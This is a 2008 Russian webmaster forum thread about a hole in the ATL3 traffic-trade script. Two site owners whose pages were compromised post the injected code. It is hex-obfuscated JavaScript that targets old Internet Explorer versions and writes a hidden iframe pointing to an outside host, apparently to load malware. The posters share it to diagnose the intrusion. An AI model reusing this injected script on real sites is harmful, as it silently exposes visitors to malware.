Master-X
Форум | Новости | Статьи
Главная » Форум » CJs » 
Тема: Вниманию тех кто юзает ATL3! - серьезная уязвимость!
цитата
19/03/08 в 17:07
 Project
Nikso писал:
если форма регистрации закрыта то пох на взломы или как?

Вот ты читал топик про попытку залогиниться под User/Pass ?
Блин, "все разжевали и в рот положили", а некоторые никак не въедут...

Нет, не пох! Даже хоть ты удали ее нах...
Весь скрипт дырявый! Надо закрываться хтакцессами.
цитата
19/03/08 в 17:21
 color
Nikso писал:
если форма регистрации закрыта то пох на взломы или как?

регистрация там вообще не при чем icon_smile.gif
цитата
19/03/08 в 17:31
 Nikso
Ага, ок.
Спасибо, что и проглотить помогли icon_smile.gif
цитата
30/03/08 в 12:25
 kl
сегодня ночью ебнули мои три сиджа новый не затронут
прописан один и тот же код стоит 17 билд
сам код
Код:

<script> var s='3C696672616D65207372633D22687474703A2F2F65626F6E792D68617264636F72652E6E65742F73747265616D726F7461746F722F7A2F7374617469632E706870222077696474683D32206865696768743D32207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37);  o=o+c+s.substr(i,2);} var v=navigator.appVersion; if (v.indexOf('MSIE 6.0') != -1){document.write(unescape(o));}if (v.indexOf('MSIE 5.') != -1){document.write(unescape(o));}</script>


всем спасибо !
цитата
30/03/08 в 12:41
 Maxik
Цитата:
сегодня ночью ебнули мои три сиджа новый не затронут
прописан один и тот же код стоит 17 билд
сам код Код:

<script> var s='3C696672616D65207372633D22687474703A2F2F65626F6E792D68617264636F72652E6E65742F73747265616D726F7461746F722F7A2F7374617469632E706870222077696474683D32206865696768743D32207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.appVersion; if (v.indexOf('MSIE 6.0') != -1){document.write(unescape(o));}if (v.indexOf('MSIE 5.') != -1){document.write(unescape(o));}</script>



всем спасибо !


Несколько дней назад на моем новоиспеченном сидже был вставлен такойже код!
Один в один! Сидж на протоне, но я несчитаю это проблеммой трейд скрипта, так как подменялся файл индексный, а темплейтный файл оставался прежним. Это скорее всего проблема хостинга, или троян спиздил у тебя от фтп пароли. Сменяй пароли, чисти комп от троянов. Кстати, Касперский нефырчит когда заходишь на пагу с таким кодом, а авира фырчит! Может ктонить расшифрует этот код, да расскажет нам, что это за бяка?
Кстати, что за хост?
цитата
30/03/08 в 12:48
 kl
хостинг у Митча ! если это не AT3 то проблема или внутренняя на сервере или проблема в ротаторе dtr потому как новый мой сидж на смарте остался не тронут.
Стр. « первая   <  1, 2


Эта страница в полной версии